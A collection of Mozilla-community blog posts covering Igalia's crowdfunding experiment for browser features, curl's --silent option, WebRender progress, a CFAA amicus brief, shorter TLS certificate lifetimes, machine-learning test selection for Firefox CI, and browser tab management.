Frédéric Wang: Igalia's contribution to the Mozilla project and Open Prioritization

Like many web platform developers and Firefox users, I believe Mozilla’s mission is instrumental for a better Internet. In a recent Igalia chat about Web Ecosystem Health, participants made the usual observation regarding the important role played by Mozilla on the one hand and its limited development resources and Firefox’s small usage share on the other hand. In this blog post, I’d like to explain an experimental idea we are launching at Igalia to try and make browser development better match the interests of the web developer and user community.

Open Prioritization by Igalia. An experiment in crowd-funding prioritization.

Igalia’s contribution to browser repositories

As mentioned in the past on this blog, Igalia has contributed to different parts of Firefox such as multimedia (e.g. <video> support), layout (e.g. Stylo, WebRender, CSS, MathML), scripts (e.g. BigInt, WebAssembly) or accessibility (e.g. ARIA). But is it enough?

Although commit count is an imperfect metric, it is also one of the easiest to obtain. Let’s take a look at how Igalia’s commits to the repositories of the Chromium (chromium, v8), Mozilla (mozilla-central, servo, servo-web-render) and WebKit projects were distributed last year:

Pie chart: the distribution of Igalia's contributions to browser repositories in 2019 (~5200 commits). Chromium (~73%), Mozilla (~4%) and WebKit (~23%).

As you can see, in absolute terms Igalia contributed roughly 3/4 of these commits to Chromium and 1/4 to WebKit, with only a small remaining amount going to Mozilla. This is not surprising, since Igalia is a consulting company and our work depends on the importance of browsers in the market, where Chromium dominates and WebKit remains very relevant for iOS devices and embedded systems.

This suggests a different way to measure our contribution: considering, for each project, the percentage of Igalia’s commits relative to the project’s total number of commits:

Bar graph: for each project, the percentage of Igalia's commits in 2019 relative to the total number of commits in the project. From left to right: Chromium (~3.96%), Mozilla (~0.43%) and WebKit (~10.92%).

In the WebKit project, where ~80% of the contributions were made by Apple, Igalia was second with ~10% of the total. In the Chromium project, the huge Google team made more than 90% of the contributions and many more companies are involved, but Igalia was still second with about 4% of the total. In the Mozilla project, Mozilla also makes ~90% of the contributions, but Igalia only accounted for ~0.5% of the total. Interestingly, the second contributing organization was… the community of unidentified gmail.com addresses! Of course, this shows the importance of volunteers in the Mozilla project, where a great effort is made to encourage participation.

Open Prioritization

From the commit count, it’s clear Igalia is not contributing as much to the Mozilla project as to the Chromium or WebKit projects. But this is expected and just reflects the priorities set by large companies. The solid base of Firefox users as well as the large number of volunteer contributors shows that the Mozilla project is nevertheless still attractive to many people. Could we turn this into browser development that is not funded by advertising or selling devices?

Another related question is whether the internet can really be shaped by the global community, as Mozilla’s mission advocates. Is the web doomed to be controlled by big corporations doing technology “evangelism” or lobbying at standardization committees? Are there prioritization issues that can be addressed by moving to a more collective decision process?

At Igalia, we try to follow a more democratic internal organization and, at our level, intend to make the world a better place. Today, we are launching a new Open Prioritization experiment to verify whether crowdfunding could be a way to influence how browser development is prioritized. Below is a short (5 min) introductory video:

I strongly recommend you take a look at the proposed projects and read the FAQ to understand how this is going to work. But remember this is an experiment, so we are starting with a few ideas that we selected and tasks that are relatively small. We know there are tons of user reports in bug trackers and suggestions for standards, but we are not going to solve everything in one day!

If the process is successful, we can consider generalizing this approach, but we need to test it first, check what works and what doesn’t, consider whether it is worth pursuing, analyze how it can be improved, etc.

Two Crowdfunding Tasks for Firefox

Representation of the CIELAB color space (top view), by Holger Everding, under CC-SA 4.0.

As explained in the previous paragraph, we are starting with small tasks. For Firefox, we selected the following ones:

  • CSS lab() colors. This is about giving web developers a way to express colors using the CIELAB color space, which better approximates human perception. My colleague Brian Kardell wrote a blog post with more details. Some investigations have been made by Apple and Google. Let’s see what we can do for Firefox!

  • SVG path d attribute. This is about expressing SVG paths using the corresponding CSS syntax, for example <path style="d: path('M0,0 L10,10,...')">. This will likely involve refactoring to use the same parser for both SVG and CSS paths. It’s a small feature, but it is part of a more general convergence effort between SVG and CSS that Igalia has been involved in.

Conclusion

Is this crowd-funded experiment going to work? Can this approach solve the prioritization problems or at least help a bit? How can we improve that idea in the future?…

There are many open questions but we will only be able to answer them if we have enough people participating. I’ll personally pledge for the two Firefox projects and I invite you to at least take a look and decide whether there is something there that is interesting for you. Let’s try and see!

Daniel Stenberg: curl ootw: --silent

Previous options of the week.

--silent (-s) existed in curl already in the first ever version released: 4.0.

Silent by default

I’ve always enjoyed the principles of Unix command line tool philosophy and I’ve tried to stay true to them in the design and implementation of the curl command line tool: everything is a pipe, don’t “speak” more than necessary by default.

As a result of the latter guideline, curl features the --verbose option if you prefer it to talk and explain more about what’s going on. By default – when everything is fine – it doesn’t speak much extra.

Initially: two things were “spoken”

To show users that something is happening during a command line invocation that takes a long time, we added a “progress meter” display. But since you can also ask curl to output text or data in the terminal, curl has logic to automatically switch off the progress meter display to avoid the content output getting mixed up with it.

Of course we very quickly figured out that there are also other use cases where the progress meter was annoying so we needed to offer a way to shut it off. To keep silent! --silent was the obvious choice for option name and -s was conveniently still available.

The other thing that curl “speaks” by default is the error message. If curl fails to perform the transfer or operation as asked to, it will output a single line message about it when it is done, and then return an error code.

When we added an option called --silent to make curl be truly silent, we also made it hush the error message. curl still returns an error code, so shell scripts and similar environments that invoke curl can still detect errors perfectly fine. Just possibly slightly less human friendly.

But I want my errors?

In May 1999, when the tool was just fourteen months old, we added --show-error (-S) for users that wanted curl to be quiet in general but still wanted to see the error message in case it failed. The -Ss combination has been commonly used ever since.

More information added

Over time we’ve made the tool more complex and we’ve felt that it needs some more informational output in some cases. For example, when you use --retry, curl will say something about it trying again, etc. The reason is of course that --verbose is really verbose, so it’s not really the way to ask for such little extra helpful info.

Only shut off the progress meter

Not too long ago, we ended up with a new situation where the --silent option is a bit too silent, since it also disables the text for retry etc. So what if you just want to shut off the progress meter?

--no-progress-meter was added for that, which thus is a modern replacement for --silent in many cases.

The Mozilla Blog: Sustainability needs culture change. Introducing Environmental Champions.

Sustainability is not just about ticking a few boxes by getting your Greenhouse Gas (GHG) emissions inventory, your reduction and mitigation goals, and your accounting in shape. Any transformation towards sustainability also needs culture change.

In launching Mozilla‘s Sustainability Programme, our Environmental Champions are a key part of driving this organisational culture change.

Recruiting, training, and working with a first cohort of Environmental Champions has been a highlight of my job in the last couple of months. I can’t wait to see their initiatives taking root across all parts of Mozilla.

We have 14 passionate and driven individuals in this first cohort. They are critical amplifiers who will nudge each and every one of us to incorporate sustainability into everything we do.

 

What makes people Champions?

“We don’t need hope, we need courage: The courage to change and impact our own decisions.”

This was among the top take-aways of our initial level-setting workshop on climate change science. In kicking off conversations around how to adjust our everyday work at Mozilla to a more sustainability-focused mindset, it was clear that hope won’t get us to where we need to be. This will require boldness and dedication.

Our champions volunteer their time for this effort. All of them have full-time roles and it was important to structure this process so that it is inviting, empowering, and impactful. To me this meant ensuring manager buy-in and securing executive sponsorship to make sure that our champions have the support to grow professionally in their sustainability work.

In the selection of this cohort, we captured the whole breadth of Mozilla: representatives from all departments, spread across regions, including office as well as remote workers, people with different tenure and job levels, and a diversity in roles. Some are involved with our GHG assessment, others are design thinkers, engineers, or programme managers, and yet others will focus on external awareness raising.

 

Responsibilities and benefits

In a nutshell, we agreed on these conditions:

Environmental Champions are:

  • Engaged through a peer learning platform with monthly meetings for all champions, including occasional conversations with sustainability experts. We currently alternate between four time zones, starting at 8am CEST (UTC+2), CST (UTC+8), EDT (UTC-4), PDT (UTC-7), respectively to equally spread the burden of global working hours.
  • Committed to spend about 2-5h each month supporting sustainability efforts at Mozilla.
  • Committed to participate in at least 1 initiative a year.
  • Committed to regularly share initiatives they are driving or participating in.
  • Dedicated to set positive examples and highlight sustainability as a catalyst of innovation.
  • Set up to provide feedback in their teams/departments, raise questions and draw attention to sustainability considerations.

The Sustainability team:

  • Provides introductory training on climate science and how to incorporate it into our everyday work at Mozilla. Introductory training will be provided at least once a year or as soon as we have a critical mass of new champions joining us on this journey.
  • Commits to inviting champions for initial feedback on new projects, e.g. sustainability policy, input on reports, research to be commissioned.
  • Regularly amplifies progress and successes of champions’ initiatives to wider staff.
  • May offer occasional access to consultants, support for evangelism (speaking, visibility, support for professional development) or other resources, where necessary and to the extent possible.

 

Curious about their initiatives?

We are just setting out and we already have a range of ambitious, inspiring projects lined up.

Sharmili, our Global Space Planner, is not only gathering necessary information around the impact of our global office spaces, she will also be leading on our reduction targets for real estate and office supplies. She puts it like this: “Reducing our Real Estate Footprint and promoting the 3 R’s (reduce, reuse, recycle) is as straight-forward as it can be tough in practice. We’ll make it happen either way.”

Ian, a machine learning engineer, is looking at Pocket recommendation guidelines and is keen to see more collections like this Earth Day 2020 one in the future.

Daria, Head of Product Design in Emerging Technologies, says: “There are many opportunities for designers to develop responsible technologies and to bring experiences that prioritize sustainability principles. It’s time we unlocked them.” She is planning to develop and apply a Sustainability Impact Assessment Tool that will be used in decision-making around product design and development.

We’ll also be looking at Firefox performance and web power usage, starting with explorations of how to better measure the impact of our products. DOM engineer Olli will be stewarding these.

And the behind the scenes editorial support thinking through content, timing, and outreach? That’s Daniel for you.

We’ll be sharing more initiatives and the progress they are all making as we move forward. In the meantime, do join us on our Matrix channel to continue the conversation.

The post Sustainability needs culture change. Introducing Environmental Champions. appeared first on The Mozilla Blog.

Mozilla GFX: moz://gfx newsletter #53

Bonjour à tous et à toutes, this is episode 53 of your favorite and only Firefox graphics newsletter. From now on, instead of peeling through commit logs, I will simply be gathering notes sent to me by the rest of the team. This means the newsletter will be shorter and hopefully a bit less overwhelming, with only the juicier bits. It will also give yours truly more time to fix bugs instead of writing about them.

Lately we have been enabling WebRender for a lot more users. For the first time, WebRender is enabled by default in Nightly for Windows 7 and macOS users with modern GPUs. Today 78% of Nightly users have WebRender enabled, 40% on beta, and 22% on release. Not all of these configurations are ready to ride the trains yet, but the numbers are going to keep going up over the next few releases.

WebRender

WebRender is a GPU based 2D rendering engine for the web written in Rust, currently powering Firefox‘s rendering engine as well as Mozilla’s research web browser Servo.

Ongoing work

  • Part of the team is now focusing on shipping WebRender on some flavors of Linux as well.
  • Worth highlighting also is the ongoing work by Martin Stránský and Robert Madder to switch Firefox on Linux from GLX to EGL. EGL is a more modern and better supported API, and it will also let us share more code between Linux and Android.
  • Lee and Jim continue work on WebRender’s software backend. It has had a bunch of correctness improvements, works properly on Windows now and has more performance improvements in the pipeline. It works on all desktop platforms and can be enabled via the pref “gfx.webrender.software”.

Performance

One of the projects that we worked on the last little while has been improving performance on lower-end/older Intel GPUs.

  • Glenn fixed a picture caching issue while scrolling Gmail.
  • Glenn fixed some over-invalidation on small screen resolutions.
  • Glenn reduced extra invalidation some more.
  • Dzmitry switched WebRender to a different CPU-to-GPU transfer strategy on Intel hardware on Windows. This avoids stalls during rendering.

Some other performance improvements that we made are:

  • Nical reduced CPU usage by re-building the scene a lot less often during scrolling.
  • Nical removed a lot of costly vector reallocation during scene building.
  • Nical reduced the amount of synchronous queries submitted to the X server on Linux, removing a lot of stalls when the GPU is busy.
  • Nical landed a series of frame building optimizations.
  • Glenn improved texture cache eviction handling. This means lower memory usage and better performance.
  • Jeff enabled GPU switching for WebRender on Mac in Nightly. Previously WebRender only used the GPU that Firefox was started with. If the GPU was switched Firefox would have very bad performance because we would be drawing with the wrong GPU.
  • Markus finished and preffed on the OS compositor configuration of WR on macOS, which uses CoreAnimation for efficient scrolling.

Driver bugs

  • Dzmitry worked around a driver bug causing visual artifacts in Firefox’s toolbar on Intel Skylake and re-enabled direct composition on these configurations.

Desktop zooming

  • Botond announced on dev-platform that desktop zooming is ready for dogfooding by Nightly users who would like to try it out by flipping the pref.
  • Botond landed a series of patches that re-works how main-thread hit testing accounts for differences between the visual and layout viewports. This fixes a number of scenarios involving the experimental desktop zooming feature (enabled using apz.allow_zooming=true), including allowing scrollbars to be dragged with desktop zooming enabled.
  • Timothy landed support for DirectManipulation preffed off. It allows users to pinch-zoom on touchpads on Windows. It can be enabled by setting apz.windows.use_direct_manipulation=true

The Mozilla Blog: Thank you, Julie Hanna

Over the last three plus years, Julie Hanna has brought extensive experience on innovation processes, global business operations, and mission-driven organizations to her role as a board member of Mozilla Corporation. We have deeply appreciated her contributions to Mozilla throughout this period, and thank her for her time and her work with the board.

Julie is now stepping back from her board commitment at Mozilla Corporation to focus more fully on her longstanding passion and mission to help pioneer and bring to market technologies that meaningfully advance social, economic and ecological justice, as evidenced by her work with Kiva, Obvious Ventures and X (formerly Google X), Alphabet’s Moonshot Factory. We look forward to continuing to see her play a key role in shaping and evolving purpose-driven technology companies across industries.

We are actively looking for a new member to join the board and seeking candidates with a range of backgrounds and experiences.

The post Thank you, Julie Hanna appeared first on The Mozilla Blog.

Mozilla Open Policy & Advocacy Blog: Laws designed to protect online security should not undermine it

Mozilla, Atlassian, and Shopify yesterday filed a friend-of-the-court brief in Van Buren v. U.S. asking the U.S. Supreme Court to consider implications of the Computer Fraud and Abuse Act for online security and privacy.

Mozilla’s involvement in this case comes from our interest in making sure that the law doesn’t stand in the way of effective online security. The Computer Fraud and Abuse Act (CFAA) was passed as a tool to combat online hacking through civil and criminal liability. However, over the years various federal circuit courts have interpreted the law so broadly as to threaten important practices for managing computer security used by Mozilla and many others. Contrary to the purpose of the statute, the lower court’s decision in this case would take a law meant to increase security and interpret it in a way that undermines that goal.

System vulnerabilities are common among even the most security conscious platforms. Finding and addressing as many of these vulnerabilities as possible relies on reporting from independent security researchers who probe and test our network. In fact, Mozilla was one of the first to offer a bug bounty program with financial rewards specifically for the purpose of encouraging external researchers to report vulnerabilities to us so we can fix them before they become widely known. By sweeping in pro-security research activities, overbroad readings of the CFAA discourage independent investigation and reporting of security flaws. The possibility of criminal liability as well as civil intensifies that chilling effect.

We encourage the Supreme Court to protect strong cybersecurity by striking the lower court’s overbroad statutory interpretation.

The post Laws designed to protect online security should not undermine it appeared first on Open Policy & Advocacy.

Mozilla Addons Blog: Changes to storage.sync in Firefox 79

Firefox 79, which will be released on July 28, includes changes to the storage.sync area. Items that extensions store in this area are automatically synced to all devices signed in to the same Firefox Account, similar to how Firefox Sync handles bookmarks and passwords. The storage.sync area has been ported to a new Rust-based implementation, allowing extension storage to share the same infrastructure and backend used by Firefox Sync.

Extension data that had been stored locally in existing profiles will automatically migrate the first time an installed extension tries to access storage.sync data in Firefox 79. After the migration, the data will be stored locally in a new storage-sync2.sqlite file in the profile directory.

If you are the developer of an extension that syncs extension storage, you should be aware that the new implementation now enforces client-side quota limits. This means that:

  • You can make a call using storage.sync.getBytesInUse to estimate how much data your extension is storing locally and whether it is over the limit.
  • If your extension previously stored data above quota limits, all that data will be migrated and available to your extension, and will be synced. However, attempting to add new data will fail.
  • If your extension tries to store data above quota limits, the storage.sync API call will raise an error. However, the extension should still successfully retrieve existing data.

We encourage you to use the Firefox Beta channel to test all extension features that use the storage.sync API to see how they behave if the client-side storage quota is exceeded before Firefox 79 is released. If you notice any regressions, please check your about:config preferences to ensure that webextensions.storage.sync.kinto is set to false and then file a bug. We do not recommend flipping this preference to true as doing so may result in data loss.

If your users report that their extension data does not sync after they upgrade to Firefox 79, please also file a bug. This is likely related to the storage.sync data migration.

Please let us know if there are any questions on our developer community forum.

The post Changes to storage.sync in Firefox 79 appeared first on Mozilla Add-ons Blog.

Mozilla Security Blog: Reducing TLS Certificate Lifespans to 398 Days

We intend to update Mozilla’s Root Store Policy to reduce the maximum lifetime of TLS certificates from 825 days to 398 days, with the aim of protecting our users’ HTTPS connections. Many reasons for reducing the lifetime of certificates have been provided and summarized in the CA/Browser Forum’s Ballot SC22. Here are Mozilla’s top three reasons for supporting this change.

1. Agility

Certificates with lifetimes longer than 398 days delay responding to major incidents and upgrading to more secure technology. Certificate revocation is highly disruptive and difficult to plan for. Certificate expiration and renewal is the least disruptive way to replace an obsolete certificate, because it happens at a pre-scheduled time, whereas revocation suddenly causes a site to stop working. Certificates with lifetimes of no more than 398 days help mitigate the threat across the entire ecosystem when a major incident requires certificate or key replacements. Additionally, phasing out certificates with MD5-based signatures took five years, because TLS certificates were valid for up to five years. Phasing out certificates with SHA-1-based signatures took three years, because the maximum lifetime of TLS certificates was three years. Weakness in hash algorithms can lead to situations in which attackers can forge certificates, so users were at risk for years after collision attacks against these algorithms were proven feasible.

2. Limit exposure to compromise

Keys valid for longer than one year have greater exposure to compromise, and a compromised key could enable an attacker to intercept secure communications and/or impersonate a website until the TLS certificate expires. A good security practice is to change key pairs frequently, which should happen when you obtain a new certificate. Thus, one-year certificates will lead to more frequent generation of new keys.

3. TLS Certificates Outliving Domain Ownership

TLS certificates provide authentication, meaning that you can be sure that you are sending information to the correct server and not to an imposter trying to steal your information. If the owner of the domain changes or the cloud service provider changes, the holder of the TLS certificate’s private key (e.g. the previous owner of the domain or the previous cloud service provider) can impersonate the website until that TLS certificate expires. The Insecure Design Demo site describes two problems with TLS certificates outliving their domain ownership:

  • “If a company acquires a previously owned domain, the previous owner could still have a valid certificate, which could allow them to MitM the SSL connection with their prior certificate.”
  • “If a certificate has a subject alt-name for a domain no longer owned by the certificate user, it is possible to revoke the certificate that has both the vulnerable alt-name and other domains. You can DoS the service if the shared certificate is still in use!”

The change to reduce the maximum validity period of TLS certificates to 398 days is being discussed in the CA/Browser Forum’s Ballot SC31 and can have two possible outcomes:

     a) If that ballot passes, then the requirement will automatically apply to Mozilla’s Root Store Policy by reference.

     b) If that ballot does not pass, then we intend to proceed with our regular process for updating Mozilla’s Root Store Policy, which will involve discussion in mozilla.dev.security.policy.

In preparation for updating our root store policy, we surveyed all of the certificate authorities (CAs) in our program and found that they all intend to limit TLS certificate validity periods to 398 days or less by September 1, 2020.

We believe that the best approach to safeguarding secure browsing is to work with CAs as partners, to foster open and frank communication, and to be diligent in looking for ways to keep our users safe.

The post Reducing TLS Certificate Lifespans to 398 Days appeared first on Mozilla Security Blog.

Hacks.Mozilla.Org: Testing Firefox more efficiently with machine learning

A browser is an incredibly complex piece of software. With such enormous complexity, the only way to maintain a rapid pace of development is through an extensive CI system that can give developers confidence that their changes won’t introduce bugs. Given the scale of our CI, we’re always looking for ways to reduce load while maintaining a high standard of product quality. We wondered if we could use machine learning to reach a higher degree of efficiency.

Continuous integration at scale

At Mozilla we have around 50,000 unique test files. Each contains many test functions. These tests need to run on all our supported platforms (Windows, Mac, Linux, Android) against a variety of build configurations (PGO, debug, ASan, etc.), with a range of runtime parameters (site isolation, WebRender, multi-process, etc.).

While we don’t test against every possible combination of the above, there are still over 90 unique configurations that we do test against. In other words, for each change that developers push to the repository, we could potentially run all 50k tests 90 different times. On an average work day we see nearly 300 pushes (including our testing branch). If we simply ran every test on every configuration on every push, we’d run approximately 1.35 billion test files per day! While we do throw money at this problem to some extent, as an independent non-profit organization, our budget is finite.

So how do we keep our CI load manageable? First, we recognize that some of those ninety unique configurations are more important than others. Many of the less important ones only run a small subset of the tests, or only run on a handful of pushes per day, or both. Second, in the case of our testing branch, we rely on our developers to specify which configurations and tests are most relevant to their changes. Third, we use an integration branch.

Basically, when a patch is pushed to the integration branch, we only run a small subset of tests against it. We then periodically run everything and employ code sheriffs to figure out if we missed any regressions. If so, they back out the offending patch. The integration branch is periodically merged to the main branch once everything looks good.

Example of a mozilla-central push on Treeherder: a subset of the tasks we run on a single mozilla-central push. The full set of tasks was too hard to distinguish when scaled to fit in a single image.

A new approach to efficient testing

These methods have served us well for many years, but it turns out they’re still very expensive. Even with all of these optimizations our CI still runs around 10 compute years per day! Part of the problem is that we have been using a naive heuristic to choose which tasks to run on the integration branch. The heuristic ranks tasks based on how frequently they have failed in the past. The ranking is unrelated to the contents of the patch. So a push that modifies a README file would run the same tasks as a push that turns on site isolation. Additionally, the responsibility for determining which tests and configurations to run on the testing branch has shifted over to the developers themselves. This wastes their valuable time and tends towards over-selection of tests.

About a year ago, we started asking ourselves: how can we do better? We realized that the current implementation of our CI relies heavily on human intervention. What if we could instead correlate patches to tests using historical regression data? Could we use a machine learning algorithm to figure out the optimal set of tests to run? We hypothesized that we could simultaneously save money by running fewer tests, get results faster, and reduce the cognitive burden on developers. In the process, we would build out the infrastructure necessary to keep our CI pipeline running efficiently.

Having fun with historical failures

The main prerequisite to a machine-learning-based solution is collecting a large and precise enough regression dataset. On the surface this appears easy. We already store the status of all test executions in a data warehouse called ActiveData. But in reality, it’s very hard to do for the reasons below.

Since we only run a subset of tests on any given push (and then periodically run all of them), it’s not always obvious when a regression was introduced. Consider the following scenario:

            Test A    Test B
  Patch 1   PASS      PASS
  Patch 2   FAIL      NOT RUN
  Patch 3   FAIL      FAIL

It is easy to see that the “Test A” failure was regressed by Patch 2, as that’s where it first started failing. However with the “Test B” failure, we can’t really be sure. Was it caused by Patch 2 or 3? Now imagine there are 8 patches in between the last PASS and the first FAIL. That adds a lot of uncertainty!

Intermittent (aka flaky) failures also make it hard to collect regression data. Sometimes tests can both pass and fail on the same codebase for all sorts of different reasons. It turns out we can’t be sure that Patch 2 regressed “Test A” in the table above after all! That is unless we re-run the failure enough times to be statistically confident. Even worse, the patch itself could have introduced the intermittent failure in the first place. We can’t assume that just because a failure is intermittent that it’s not a regression.

The “not sure if” Futurama Fry meme: the writers of this post having a hard time.

Our heuristics

In order to solve these problems, we have built quite a large and complicated set of heuristics to predict which regressions are caused by which patch. For example, if a patch is later backed out, we check the status of the tests on the backout push. If they’re still failing, we can be pretty sure the failures were not due to the patch. Conversely, if they start passing we can be pretty sure that the patch was at fault.

Some failures are classified by humans. This can work to our advantage. Part of the code sheriff’s job is annotating failures (e.g. “intermittent” or “fixed by commit” for failures fixed at some later point). These classifications are a huge help finding regressions in the face of missing or intermittent tests. Unfortunately, due to the sheer number of patches and failures happening continuously, 100% accuracy is not attainable. So we even have heuristics to evaluate the accuracy of the classifications!

Tweet from @MozSherifMemes (“Today's menu: Intermittent code linting failures based on the same revision.”): sheriffs complaining about intermittent failures.

Another trick for handling missing data is to backfill missing tests. We select tests to run on older pushes where they didn’t initially run, for the purpose of finding which push caused a regression. Currently, sheriffs do this manually. However, there are plans to automate it in certain circumstances in the future.

Collecting data about patches

We also need to collect data about the patches themselves, including files modified and the diff.  This allows us to correlate with the test failure data. In this way, the machine learning model can determine the set of tests most likely to fail for a given patch.

Collecting data about patches is way easier, as it is totally deterministic. We iterate through all the commits in our Mercurial repository, parsing patches with our rust-parsepatch project and analyzing source code with our rust-code-analysis project.

Designing the training set

Now that we have a dataset of patches and associated tests (both passes and failures), we can build a training set and a validation set to teach our machines how to select tests for us.

90% of the dataset is used as a training set, 10% is used as a validation set. The split must be done carefully. All patches in the validation set must be posterior to those in the training set. If we were to split randomly, we’d leak information from the future into the training set, causing the resulting model to be biased and artificially making its results look better than they actually are.

For example, consider a test which had never failed until last week and has failed a few times since then. If we train the model with a randomly picked training set, we might find ourselves in the situation where a few failures are in the training set and a few in the validation set. The model might be able to correctly predict the failures in the validation set, since it saw some examples in the training set.

In a real-world scenario though, we can’t look into the future. The model can’t know what will happen in the next week, but only what has happened so far. To evaluate properly, we need to pretend we are in the past, and future data (relative to the training set) must be inaccessible.

Diagram showing the scale of the training set (90%) to the validation set (10%): a visualization of our split between training and validation sets.

Building the model

We train an XGBoost model, using features from the test, the patch, and the links between them, e.g.:

  • In the past, how often did this test fail when the same files were touched?
  • How far in the directory tree are the source files from the test files?
  • How often in the VCS history were the source files modified together with the test files?

Full view of the model training infrastructure.

The input to the model is a tuple (TEST, PATCH), and the label is a binary FAIL or NOT FAIL. This means we have a single model that is able to take care of all tests. This architecture allows us to exploit the commonalities between test selection decisions in an easy way. A normal multi-label model, where each test is a completely separate label, would not be able to extrapolate the information about a given test and apply it to another completely unrelated test.

Given that we have tens of thousands of tests, even if our model was 99.9% accurate (which is pretty accurate, just one error every 1000 evaluations), we’d still be making mistakes for pretty much every patch! Luckily the cost associated with false positives (tests which are selected by the model for a given patch but do not fail) is not as high in our domain, as it would be if say, we were trying to recognize faces for policing purposes. The only price we pay is running some useless tests. At the same time we avoided running hundreds of them, so the net result is a huge savings!

As developers periodically switch what they are working on, the dataset we train on evolves. So we currently retrain the model every two weeks.

Optimizing configurations

After we have chosen which tests to run, we can further improve the selection by choosing where the tests should run. In other words, the set of configurations they should run on. We use the dataset we’ve collected to identify redundant configurations for any given test. For instance, is it really worth running a test on both Windows 7 and Windows 10? To identify these redundancies, we use a solution similar to frequent itemset mining:

  1. Collect failure statistics for groups of tests and configurations
  2. Calculate the “support” as the number of pushes in which both X and Y failed over the number of pushes in which they both ran
  3. Calculate the “confidence” as the number of pushes in which both X and Y failed over the number of pushes in which they both ran and only one of the two failed (both ratios are written out as formulas below).
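Written out as formulas (a direct transcription of the two definitions above, where X and Y stand for the two test/configuration combinations being compared):

\[ \mathrm{support}(X, Y) = \frac{\#\{\text{pushes in which both } X \text{ and } Y \text{ failed}\}}{\#\{\text{pushes in which both } X \text{ and } Y \text{ ran}\}} \]

\[ \mathrm{confidence}(X, Y) = \frac{\#\{\text{pushes in which both } X \text{ and } Y \text{ failed}\}}{\#\{\text{pushes in which both ran and only one of the two failed}\}} \]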

We only select configuration groups where the support is high (low support would mean we don’t have enough proof) and the confidence is high (low confidence would mean we had many cases where the redundancy did not apply).

Once we have the set of tests to run, information on whether their results are configuration-dependent or not, and a set of machines (with their associated cost) on which to run them, we can formulate a mathematical optimization problem which we solve with a mixed-integer programming solver. This way, we can easily change the optimization objective we want to achieve without invasive changes to the optimization algorithm. At the moment, the optimization objective is to select the cheapest configurations on which to run the tests.

For the mathematically inclined among you, an instance of the optimization problem for a theoretical situation with three tests and three configurations. Test 1 and Test 3 are fully platform-independent. Test 2 must run on configuration 3 and on one of configuration 1 or configuration 2.
Minimize: c1·x1 + c2·x2 + c3·x3 (the total cost of the selected configurations, where xj = 1 if configuration j is selected)
Subject to: x1 + x2 + x3 ≥ 1 (Test 1 and Test 3 can run on any configuration), x3 ≥ 1 and x1 + x2 ≥ 1 (Test 2 needs configuration 3 and one of configurations 1 or 2)
And: x1, x2, x3 ∈ {0, 1}

Using the model

A machine learning model is only as useful as a consumer’s ability to use it. To that end, we decided to host a service on Heroku using dedicated worker dynos to service requests and Redis Queues to bridge between the backend and frontend. The frontend exposes a simple REST API, so consumers need only specify the push they are interested in (identified by the branch and topmost revision). The backend will automatically determine the files changed and their contents using a clone of mozilla-central.

Depending on the size of the push and the number of pushes in the queue to be analyzed, the service can take several minutes to compute the results. We therefore ensure that we never queue up more than a single job for any given push. We cache results once computed. This allows consumers to kick off a query asynchronously, and periodically poll to see if the results are ready.

We currently use the service when scheduling tasks on our integration branch. It’s also used when developers run the special mach try auto command to test their changes on the testing branch. In the future, we may also use it to determine which tests a developer should run locally.

Sequence diagram depicting the communication between the various actors in our infrastructure.

Measuring and comparing results

From the outset of this project, we felt it was crucial that we be able to run and compare experiments, measure our success and be confident that the changes to our algorithms were actually an improvement on the status quo. There are effectively two variables that we care about in a scheduling algorithm:

  1. The amount of resources used (measured in hours or dollars).
  2. The regression detection rate. That is, the percentage of introduced regressions that were caught directly on the push that caused them. In other words, we didn’t have to rely on a human to backfill the failure to figure out which push was the culprit.

We defined our metric:

scheduler effectiveness = 1000 * regression detection rate / hours per push
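To make the units concrete, here is a purely illustrative calculation (the numbers are made up, not Mozilla’s actual figures): a scheduler that catches 80% of introduced regressions while using 300 compute hours per push would score

\[ 1000 \times \frac{0.80}{300} \approx 2.7 \]

and halving the hours per push at the same detection rate would double that score.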

The higher this metric, the more effective a scheduling algorithm is. Now that we had our metric, we invented the concept of a “shadow scheduler”. Shadow schedulers are tasks that run on every push, which shadow the actual scheduling algorithm. Only rather than actually scheduling things, they output what they would have scheduled had they been the default. Each shadow scheduler may interpret the data returned by our machine learning service a bit differently. Or they may run additional optimizations on top of what the machine learning model recommends.

Finally we wrote an ETL to query the results of all these shadow schedulers, compute the scheduler effectiveness metric of each, and plot them all in a dashboard. At the moment, there are about a dozen different shadow schedulers that we’re monitoring and fine-tuning to find the best possible outcome. Once we’ve identified a winner, we make it the default algorithm. And then we start the process over again, creating further experiments.

Conclusion

The early results of this project have been very promising. Compared to our previous solution, we’ve reduced the number of test tasks on our integration branch by 70%! Compared to a CI system with no test selection, by almost 99%! We’ve also seen pretty fast adoption of our mach try auto tool, suggesting a usability improvement (since developers no longer need to think about what to select). But there is still a long way to go!

We need to improve the model’s ability to select configurations and default to that. Our regression detection heuristics and the quality of our dataset needs to improve. We have yet to implement usability and stability fixes to mach try auto.

And while we can’t make any promises, we’d love to package the model and service up in a way that is useful to organizations outside of Mozilla. Currently, this effort is part of a larger project that contains other machine learning infrastructure originally created to help manage Mozilla’s Bugzilla instance. Stay tuned!

If you’d like to learn more about this project or Firefox’s CI system in general, feel free to ask on our Matrix channel, #firefox-ci:mozilla.org.

The post Testing Firefox more efficiently with machine learning appeared first on Mozilla Hacks - the Web developer blog.

Karl Dubost: Browser Wish List - Tabs Time Machine

Each time I ask people around me how many tabs are opened in their current desktop browser session, most of them have numbers around these per session (July 2020):

  • Release: 4 tabs (median) and 8 tabs (mean)
  • Nightly: 4 tabs (median) and 51 tabs (mean)

(Having a graph of the full distribution would be interesting here.)

It would be interesting to see the exact distribution, because there is a cohort with a very high number of tabs. I usually have between 300 and 500 tabs opened, and sometimes I clean up everything. But after an internal discussion at Mozilla, I realized some people had even more, toward a couple of thousand tabs opened at once.

While we are by no means the majority, we are definitely a group of people who work with browsers intensively and have specific needs that browsers currently do not address. Also, we have to be careful with these stats, which come from a self-selecting group of people: if there is nothing to help manage a high number of tabs, it is unlikely that many people will be ready to painstakingly manage a high number of tabs.

The Why?

I use a lot of tabs.

But if I turn my head to my bookshelf, there are probably around 2000+ books in there. My browser is a bookshelf or library of content, and a desk. But it is one which is currently not very good at organizing my content. I keep tabs opened:

  • to access reference content (articles, guidebook, etc)
  • to talk about it later on with someone else or in a blog post
  • to have access to tasks (opening 30 bugs I need to go through this week)

I sometimes open some tabs twice. I sometimes close a tab by mistake without realizing it, and then when I search for the content again I can't find it. I can't do a full text search on all open tabs. I can only manage the tabs vertically with an addon (right now I'm using Tabs Center Redux). And if by any bad luck we are offline and the tabs had not been navigated beforehand, we lose the full content we needed.

So I’m often grumpy at my browser.

